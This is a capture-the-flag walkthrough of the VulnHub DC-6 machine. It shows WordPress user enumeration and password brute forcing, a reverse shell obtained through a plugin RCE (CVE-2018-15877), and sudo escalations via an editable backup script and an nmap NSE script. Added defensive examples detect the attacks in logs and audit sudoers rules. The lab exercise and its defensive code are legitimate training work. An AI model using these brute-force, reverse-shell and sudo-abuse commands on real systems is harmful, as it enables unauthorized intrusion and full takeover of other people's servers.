DC-6

I'm here again to present another boot2root VM to you. This time I bring you DC-6.
This machine was released on 26 April 2019 and can be downloaded from https://www.vulnhub.com/entry/dc-6,315/.
Without further ado, let's get to what matters!

As always, we start with host discovery:

$netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:00 1 60 Unknown vendor
192.168.56.100 08:00:27:9f:1c:47 1 60 PCS Systemtechnik GmbH
192.168.56.101 08:00:27:af:04:55 1 60 PCS Systemtechnik GmbH

Now that we have identified our target, we can discover which services exist on this host:

$nmap -sS -sV -sC -Pn -p- 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-25 19:30 EDT                                                
Nmap scan report for 192.168.56.101
Host is up (0.00014s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)                                             
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)                                                 
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)                                                
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)                                              
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 08:00:27:AF:04:55 (Oracle VirtualBox virtual NIC)                                                 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                 
Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds

Based on the nmap output and the information provided by the challenge author, we have to add the entry "192.168.56.101 wordy" to /etc/hosts.

After adding it, just open the web application.

[Screenshot: 2019-06-29 15-47-44]

Since it is a WordPress site, let's run wpscan to try to identify a valid user.

$wpscan --url http://wordy/ -e u,vp --plugins-detection aggressive 
[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] sarah
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Five users were identified. Let's put them in a list for use in a brute-force attack later.

$ cat user.lst 
jens
mark
graham
sarah
admin

Based on the hint provided…

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. 😉

We have to filter some passwords out of rockyou.txt; otherwise the run time will be far too long.

$cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.lst                                   
root@kali:~# wc -l passwords.lst
2668 passwords.lst

All set… now that we have a list of valid users and candidate passwords, let's run a brute force.

$wpscan --url http://wordy/ -U user.lst -P passwords.lst

[i] Valid Combinations Found:
 | Username: mark, Password: helpdesk01
[+] Finished: Tue Jun 25 20:12:37 2019
[+] Requests Done: 12598
[+] Cached Requests: 5
[+] Data Sent: 5.028 MB
[+] Data Received: 7.671 MB
[+] Memory used: 127.301 MB
[+] Elapsed time: 00:03:25

Access credential identified.
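Both things wpscan did above leave clear traces in the web server's access log: the author-id and REST-API user enumeration, and the burst of POSTs to wp-login.php (12598 requests in under four minutes). The following detector is an added example, not part of the original writeup; it runs over constructed Apache log lines modelled on this run, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache combined-log prefix: client ident user [timestamp] "METHOD PATH ..." status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (not a real capture), modelled on the wpscan run above:
# an author-id sweep, the REST users endpoint, then a burst of wp-login.php POSTs.
SAMPLE_LOG = [
    '192.168.56.102 - - [25/Jun/2019:20:08:01 -0400] "GET /?author=1 HTTP/1.1" 301 0',
    '192.168.56.102 - - [25/Jun/2019:20:08:01 -0400] "GET /?author=2 HTTP/1.1" 301 0',
    '192.168.56.102 - - [25/Jun/2019:20:08:02 -0400] "GET /?author=3 HTTP/1.1" 301 0',
    '192.168.56.102 - - [25/Jun/2019:20:08:05 -0400] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812',
] + [
    f'192.168.56.102 - - [25/Jun/2019:20:09:{s:02d} -0400] "POST /wp-login.php HTTP/1.1" 200 4523'
    for s in range(10, 16)
]

def parse(line):
    # Return (ip, datetime, method, path, status), or None for lines that do not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect(lines, login_threshold=5, window_s=60, author_threshold=3):
    # Flag per-client WordPress user enumeration and login brute-force patterns.
    findings = set()
    login_times = defaultdict(list)   # ip -> timestamps of recent wp-login.php POSTs
    author_ids = defaultdict(set)     # ip -> distinct ?author=N ids requested
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, t, method, path, _status = rec
        if "/wp-json/wp/v2/users" in path:
            findings.add((ip, "user enumeration via REST users endpoint"))
        m = re.search(r"[?&]author=(\d+)", path)
        if m:
            author_ids[ip].add(int(m.group(1)))
            if len(author_ids[ip]) >= author_threshold:
                findings.add((ip, "author id enumeration"))
        if method == "POST" and path.startswith("/wp-login.php"):
            # Sliding window: keep only POSTs within window_s of this one, then count.
            login_times[ip] = [x for x in login_times[ip] if (t - x).total_seconds() <= window_s]
            login_times[ip].append(t)
            if len(login_times[ip]) >= login_threshold:
                findings.add((ip, "login brute force"))
    return sorted(findings)
```

Running `detect(SAMPLE_LOG)` reports all three patterns for 192.168.56.102, while a single legitimate login does not trip the POST threshold.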

Let's validate access to the administration portal using this credential.

[Screenshot: 2019-06-26 00-41-46]

When we first ran wpscan to identify users, we also identified the vulnerable plugins.

[+] plainview-activity-monitor                                                                                  
 | Location: http://wordy/wp-content/plugins/plainview-activity-monitor/                                        
 | Last Updated: 2018-08-26T15:08:00.000Z                                                                       
 | Readme: http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt                                
 | [!] The version is out of date, the latest version is 20180826                                               
 | [!] Directory listing is enabled                                                                             
 |                                                                                                              
 | Detected By: Known Locations (Aggressive Detection)                                                          
 |                                                                                                             
 | [!] 1 vulnerability identified:                               
 |                                                               
 | [!] Title: Plainview Activity Monitor <= 20161228 - Remote Command Execution (RCE)                          
 |     Fixed in: 20180826                                                                                      
 |     References:                                                                                              
 |      - https://wpvulndb.com/vulnerabilities/9114                                                             
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15877                                         
 |      - https://plugins.trac.wordpress.org/changeset/1930493/plainview-activity-monitor                       
 |      - https://github.com/aas-n/CVE/tree/master/CVE-2018-15877             
 |                                                    
 | Version: 20161228 (50% confidence)
 | Detected By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt

And to make our lives easier, we identified the Plainview Activity Monitor plugin, which has an RCE (CVE-2018-15877).

After downloading the exploit, we only had to make a few small changes.

[Screenshot: 2019-06-26 00-39-04]

And run it.

[Screenshot: 2019-06-29 17-28-58]

$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 48040
python -c 'import pty;pty.spawn("/bin/bash")';
www-data@dc-6:/var/www/html/wp-admin$ ^Z
[1]+ Stopped nc -nvlp 4444
root@kali:~/Documents/vulnhub/dc-6# stty raw -echo
root@kali:~/Documents/vulnhub/dc-6# nc -nvlp 4444

www-data@dc-6:/var/www/html/wp-admin$ export TERM=screen
www-data@dc-6:/var/www/html/wp-admin$ export SHELL=/bin/bash
www-data@dc-6:/var/www/html/wp-admin$ stty rows 33 cols 112
www-data@dc-6:/var/www/html/wp-admin$


As always… time to escalate privileges!

We found user graham's password inside the things-to-do.txt file.

www-data@dc-6:/var/www/html/wp-admin$ ls -lR /home
/home:
total 16
drwxr-xr-x 2 graham graham 4096 Apr 26 13:28 graham
drwxr-xr-x 2 jens jens 4096 Apr 26 13:29 jens
drwxr-xr-x 3 mark mark 4096 Apr 26 13:28 mark
drwxr-xr-x 2 sarah sarah 4096 Apr 24 23:07 sarah

/home/graham:
total 0

/home/jens:
total 4
-rwxrwxr-x 1 jens devs 50 Apr 26 02:19 backups.sh

/home/mark:
total 4
drwxr-xr-x 2 mark mark 4096 Apr 26 01:56 stuff

/home/mark/stuff:
total 4
-rw-r--r-- 1 mark mark 241 Apr 26 01:53 things-to-do.txt

/home/sarah:
total 0
www-data@dc-6:/var/www/html/wp-admin$ cat /home/mark/stuff/things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/var/www/html/wp-admin$

Switching to user graham.

www-data@dc-6:/var/www/html/wp-admin$ su graham                                                                                                     
Password: 
graham@dc-6:/var/www/html/wp-admin$

We are allowed to run a backup script with user jens's privileges.

graham@dc-6:/var/www/html/wp-admin$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/var/www/html/wp-admin$

Let's escalate privileges horizontally by adding a call to /bin/bash inside that script.

$ cat /home/jens/backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash

And run it via sudo.

$ sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
tar (child): backups.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: backups.tar.gz: Wrote only 4096 of 10240 bytes
tar: Child returned status 2
tar: Error is not recoverable: exiting now
jens@dc-6:/var/www/html/wp-admin$ id
uid=1004(jens) gid=1004(jens) groups=1004(jens),1005(devs)
jens@dc-6:/var/www/html/wp-admin$

Now we find that user jens can run nmap with superuser privileges.

$ sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
jens@dc-6:/var/www/html/wp-admin$

So let's use it to escalate privileges.

echo "os.execute('/bin/bash')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2019-07-03 06:37 AEST
root@dc-6:/var/www/html/wp-admin# 
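Both privilege escalations above come from sudo rules that a configuration audit would catch: a NOPASSWD script that the calling user can edit, and a root rule for a binary that runs arbitrary scripts. The following audit is an added example, not the challenge's or the author's code; the sudoers lines, file ownership and group membership are constructed from the output above, and graham's membership in devs is an assumption.

```python
import re

# Constructed sudoers rules modelled on the two `sudo -l` results above (this is
# an added example, not the challenge's real /etc/sudoers).
SUDOERS = [
    "graham ALL=(jens) NOPASSWD: /home/jens/backups.sh",
    "jens ALL=(root) NOPASSWD: /usr/bin/nmap",
]
# Constructed file metadata (owner, group, mode) modelled on `ls -lR /home`.
FILES = {
    "/home/jens/backups.sh": ("jens", "devs", 0o775),
    "/usr/bin/nmap": ("root", "root", 0o755),
}
# Constructed group membership. jens's groups come from the `id` output above;
# graham being in devs is an assumption (it is what lets him edit backups.sh).
GROUPS = {"graham": {"graham", "devs"}, "jens": {"jens", "devs"}}

# Binaries that hand the caller a shell or run arbitrary scripts when allowed
# through sudo without restricted arguments; nmap (--script) is the case above.
SHELL_CAPABLE = {"nmap", "vim", "vi", "less", "more", "find", "tar", "python", "perl"}

RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\((\S+)\))?\s*(NOPASSWD:)?\s*(\S+)")

def user_can_write(user, path):
    # POSIX permission check against the constructed metadata.
    owner, group, mode = FILES[path]
    if owner == user and mode & 0o200:
        return True
    if group in GROUPS.get(user, ()) and mode & 0o020:
        return True
    return bool(mode & 0o002)

def audit(rules=SUDOERS):
    # Return (user, runas, command, reason) for each risky rule.
    findings = []
    for line in rules:
        m = RULE.match(line)
        if not m:
            continue
        user, runas, _nopasswd, cmd = m.groups()
        runas = runas or "root"           # sudo defaults the target user to root
        if cmd in FILES and user_can_write(user, cmd):
            findings.append((user, runas, cmd, "target is writable by the invoking user"))
        if cmd.rsplit("/", 1)[-1] in SHELL_CAPABLE:
            findings.append((user, runas, cmd, "binary can spawn a shell or run scripts"))
    return findings
```

The fix on a real host is the same in both cases: the script must be owned by and writable only by the target user (or root), and rules for script-capable binaries should either be removed or pinned to exact arguments.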

Collecting the flag.

root@dc-6:/var/www/html/wp-admin# cd /root
root@dc-6:~# ls
theflag.txt
root@dc-6:~# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


root@dc-6:~#


Bonus:

Besides the plainview-activity-monitor plugin, we can also use the user-role-editor plugin as an entry point.

[+] user-role-editor
| Location: http://wordy/wp-content/plugins/user-role-editor/
| Last Updated: 2019-06-15T05:45:00.000Z
| Readme: http://wordy/wp-content/plugins/user-role-editor/readme.txt
| [!] The version is out of date, the latest version is 4.51.1
|
| Detected By: Known Locations (Aggressive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: User Role Editor <= 4.24 - Privilege Escalation
| Fixed in: 4.25
| References:
| - https://wpvulndb.com/vulnerabilities/8432
| - https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/
|
| Version: 4.24 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://wordy/wp-content/plugins/user-role-editor/readme.txt

Using this vuln, we can escalate privileges to administrator. We just need to follow these steps:

  1. Go to the Users menu
  2. Then Your Profile
  3. And finally Update Profile

Intercepting the request with Burp, we need to add the parameter ure_other_roles=administrator

[Screenshot: 2019-07-04 23-27-46]

Opening the Users page again, we notice that user mark now has the Administrator role.

[Screenshot: 2019-07-04 23-29-24]

With that, just use yertle to get a shell on the machine.

Until next time.

References:
https://www.exploit-db.com/exploits/45274
https://www.andreafortuna.org/2018/05/16/exploiting-sudo-for-linux-privilege-escalation/
https://packetstormsecurity.com/files/147515/WordPress-User-Role-Editor-Plugin-Privilege-Escalation.html
